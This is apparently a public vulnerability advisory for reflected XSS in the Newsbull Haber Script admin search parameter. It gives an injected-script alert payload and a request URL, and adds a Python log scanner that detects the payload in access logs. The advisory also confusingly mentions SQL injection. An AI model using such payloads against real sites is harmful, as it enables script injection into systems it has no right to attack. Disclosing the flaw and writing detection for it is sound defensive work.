####################################################################
# Exploit Title: Newsbull Haber Script - XSS Vulnerabilities
# Dork: N/A
# Date: 28-01-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://newsbull.org/
# Software Link: https://github.com/gurkanuzunca/newsbull
# Version: 1.0.0
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
####################################################################
# Vulnerabilities
# For the SQL injection to be applied, the user must log in.
# The vulnerability can be reproduced with the XSS payload given in the PoC section.
# Proof of the vulnerability is in the links below.
# https://i.hizliresim.com/4jaYlq.jpg
# https://i.hizliresim.com/mM2qLZ.jpg
####################################################################
# POC - XSS
# Parameters : search
# Attack Pattern : ’--></style></scRipt><scRipt>alert(0x007454)</scRipt>
# GET Request : http://localhost/newsbull/admin/category/records?search=’--></style></scRipt><scRipt>alert(0x007454)</scRipt>
####################################################################
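# Detection example (added here, not part of the original advisory or the Newsbull code):
# it scans web access logs for requests to the affected endpoint whose "search" value
# decodes to markup. The combined log format and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path suffix and parameter name come from the advisory's GET request.
TARGET_SUFFIX = "/admin/category/records"
PARAM = "search"
# Assumption: Apache/Nginx "combined" style access log lines.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Tags and comment terminators that a plain search term should never contain.
MARKUP_RE = re.compile(r"<\s*/?\s*(script|style|img|svg|iframe)\b|-->", re.I)

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2019:10:00:01 +0000] "GET /newsbull/admin/category/records?search=economy HTTP/1.1" 200 5120',
    '192.0.2.77 - - [28/Jan/2019:10:02:13 +0000] "GET /newsbull/admin/category/records?search=%27--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Ealert(1)%3C%2FscRipt%3E HTTP/1.1" 200 5340',
    '192.0.2.80 - - [28/Jan/2019:10:05:40 +0000] "GET /newsbull/admin/category/records?search=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 5340',
    '192.0.2.10 - - [28/Jan/2019:10:06:02 +0000] "GET /newsbull/admin/news/records?search=%3Cb%3E HTTP/1.1" 200 100',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253C -> %3C -> <), bounded by `rounds`."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_value) for each hit on the affected parameter."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(TARGET_SUFFIX):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)
            if MARKUP_RE.search(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(ip, repr(value))
```
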